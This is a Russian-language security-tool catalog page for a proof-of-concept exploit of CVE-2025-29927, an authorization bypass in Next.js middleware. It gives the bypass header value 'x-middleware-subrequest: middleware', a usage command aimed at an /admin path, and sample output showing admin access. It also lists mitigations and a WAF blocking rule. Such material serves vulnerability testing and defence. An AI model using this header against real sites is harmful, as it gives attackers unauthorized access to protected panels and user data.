Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-29927-PoC — Вот простой, но эффективный эксплойт для CVE-2025-29927. | Kitploit
Инструменты/GitHubGitHub/w2hcorp/cve-2025-29927-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеRed Teaming
GitHubw2hcorp/cve-2025-29927-poc

CVE-2025-29927-PoC

Вот простой, но эффективный эксплойт для CVE-2025-29927.

Репозиторий
1131 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-29927 - Обход авторизации Next.js Middleware (PoC)

Этот репозиторий содержит эксплойт Proof of Concept (PoC) для CVE-2025-29927 — критической уязвимости в Next.js, которая позволяет злоумышленникам обходить проверки авторизации, злоупотребляя специфическим для middleware HTTP-заголовком.


Обзор

  • Идентификатор CVE: CVE-2025-29927
  • Критичность: Критический (CVSS 9.1)
  • Затронутый фреймворк: Next.js
  • Тип уязвимости: Обход авторизации
  • Вектор эксплуатации: HTTP-заголовок запроса
  • Сложность эксплуатации: Низкая
  • Требуется аутентификация: Нет

Об уязвимости

Приложения Next.js часто полагаются на middleware для авторизации и контроля доступа. Данная CVE возникает из-за логической ошибки в обработке заголовка x-middleware-subrequest. Когда этот заголовок установлен в middleware, сервер может ошибочно предположить, что запрос поступил из внутренней логики, и обойти авторизацию на основе middleware.

Это может позволить злоумышленникам получить доступ к панелям администратора, защищенным API или пользовательским данным —

без учетных данных или действительной сессии.

PoC Эксплойт

Мы предоставляем простой Python-скрипт для проверки уязвимости приложения Next.js.

▶️ Использование

root@kitploit:~
python3 exploit.py --url https://target.com --path /admin [--proxy http://127.0.0.1:8080]

Пример вывода

root@kitploit:~
[+] Sending request to: https://target.com/admin
[+] Using header: x-middleware-subrequest: middleware
[+] Status Code: 200
[+] Response Body (first 500 chars):
<!DOCTYPE html><html><head>...You are logged in as admin...

Зависимости

  • Python 3.6+
  • библиотека requests

Меры по смягчению

  • Обновитесь до последней исправленной версии Next.js.
  • Избегайте использования x-middleware-subrequest как сигнала доверия.
  • Реализуйте проверку сессий на серверной стороне и надлежащие проверки авторизации в защищенных маршрутах.
  • Рассмотрите добавление правил WAF/IDS для блокировки или пометки подозрительного использования этого заголовка.

Логика WAF:

root@kitploit:~
if header 'x-middleware-subrequest' == 'middleware':
    block_request()

Раскрытие и благодарности

Данный PoC был разработан командой Offensive Security Team в W2H Corp. в рамках наших постоянных исследований уязвимостей. Оригинальная статья с объяснением CVE находится здесь.

Скачать инструмент